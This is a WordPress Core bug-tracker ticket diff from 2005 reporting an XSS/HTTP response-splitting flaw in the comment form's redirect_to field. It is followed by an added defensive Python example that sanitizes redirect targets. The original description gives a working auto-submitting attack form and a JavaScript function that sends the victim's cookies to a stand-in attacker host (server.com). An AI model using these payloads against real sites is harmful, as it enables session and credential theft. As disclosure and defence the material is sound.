Make WordPress Core

Changes between Initial Version and Version 3 of Ticket #1871


Timestamp:
11/13/2005 12:04:55 AM
Author:
markjaquith
Comment:

  • Ticket #1871

    • Property Status changed from new to closed
    • Property Reporter ManiacSoftwareManiacsOrg deleted
    • Property Resolution changed from to invalid
    • Property Summary changed from XSS vulnerability through redirects to Redacted
  • Ticket #1871 – Description

    initial:

    On a Russian blog today [http://weblog.netlux.org/archive/2005/wordpress-xss.html was discovered] an XSS vulnerability allowing an attacker to get the user's cookies with login and password.

    Here's a quick retranslation in English (since all Russian-English automatic translators suck):

    blog.wp.com - attacked blog
    server.com - attacker's server

    The attacker gives the link to this file to a victim (with the victim's URL and a real comment id in the comment_post_ID field):

    {{{
    <html>
        <body onLoad=document.forms["loginform"].submit()>
            <form name="loginform" id="loginform" action="http://blog.wp.com/wp-comments-post.php" method="post">
                <input type="hidden" name="comment_post_ID" value="1" />
                <input type="hidden" name="author" value="Wordpress-bug notifier" />
                <input type="hidden" name="email" value="xss@xss.xss" />
                <input type="hidden" name="url" value="http://ya.ru" />
                <input type="hidden" name="comment" value='Please fix xss-vulnerability on your Wopdpress blog engine.' />
                <textarea name="redirect_to" style="display: none;">

    Content-Type: text/html


    <html><body><script language=JavaScript src=http://server.com/js.js type=text/javascript></script><script>cook()</script><!--</textarea>
            </form>
        </body>
    </html>
    }}}

    This looks like an ordinary comment form which submits itself on page load. On submitting, the victim's browser executes the JS code from server.com/js.js:

    {{{
    function cook() {
        document.location = "http://server.com/log.php?" + document.cookie;
    }
    }}}

    which transfers the victim's cookie to the attacker's server.

    This bug can be fixed by urlencoding the redirect location in wp-comments-post.php on line 62:

    {{{
    wp_redirect(urlencode($location));
    }}}

    v3:

    Redacted
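As an added example from a defender's perspective (not code from the ticket, the reporter, or WordPress), the Python below shows the server-side check the report calls for: the user-supplied redirect target is stripped of CR, LF and every other character that cannot appear in a URL, so it can never terminate the Location header and start a new header or response body, and it is then restricted to the site's own host or a site-relative path. It strips rather than URL-encodes the whole location, since urlencoding the entire string would also encode the scheme separator and slashes and break the redirect. The host blog.wp.com, the allow-list and the payload string are constructed for the example.

```python
"""Added example (not WordPress code): hardening a redirect target against
CRLF header injection (HTTP response splitting) of the kind described in the
ticket. ALLOWED_HOSTS and SPLITTING_PAYLOAD are constructed for the example."""
import re
from urllib.parse import urlsplit, urlunsplit

# Hosts this site is willing to redirect to (constructed for the example).
ALLOWED_HOSTS = {"blog.wp.com"}

# Characters that may legitimately appear in a URL (RFC 3986 unreserved,
# reserved and percent). Anything else, notably CR, LF, spaces and angle
# brackets, is removed so it can never reach a response header.
_NOT_URL_CHAR = re.compile(r"[^A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]")

# A response-splitting payload of the shape shown in the ticket: a real
# redirect target followed by a fake header block and an HTML body.
SPLITTING_PAYLOAD = (
    "http://blog.wp.com/?p=1\r\n"
    "\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><script src=http://server.com/js.js></script></body></html>"
)


def strip_header_breakers(location: str) -> str:
    """Remove every character that is not valid in a URL, including CR/LF."""
    return _NOT_URL_CHAR.sub("", location)


def sanitize_redirect(location: str, fallback: str = "/") -> str:
    """Return a safe Location value.

    Accepts an http(s) URL on an allowed host, or a site-relative path that
    starts with a single '/'. Anything else (foreign host, scheme-relative
    '//host', 'javascript:' and other schemes) yields the fallback.
    """
    cleaned = strip_header_breakers(location)
    if not cleaned:
        return fallback
    parts = urlsplit(cleaned)
    if parts.scheme or parts.netloc:
        if parts.scheme not in ("http", "https"):
            return fallback
        if parts.hostname not in ALLOWED_HOSTS:
            return fallback
        return urlunsplit(parts)
    # Relative target: '//server.com/x' would be scheme-relative, so require
    # exactly one leading slash.
    if cleaned.startswith("/") and not cleaned.startswith("//"):
        return cleaned
    return fallback


def location_header(location: str) -> str:
    """Build the header line; refuse anything that could still split it."""
    safe = sanitize_redirect(location)
    if "\r" in safe or "\n" in safe:
        raise ValueError("control characters in redirect target")
    return f"Location: {safe}"


if __name__ == "__main__":
    print(location_header(SPLITTING_PAYLOAD))
    print(location_header("/?p=1#comments"))
    print(location_header("http://server.com/log.php"))
```

The stripping step alone defeats response splitting (the injected header block collapses into harmless query-string text on the original target); the host check additionally closes the open-redirect case, so the comment form cannot be used to bounce a visitor to an attacker-controlled site.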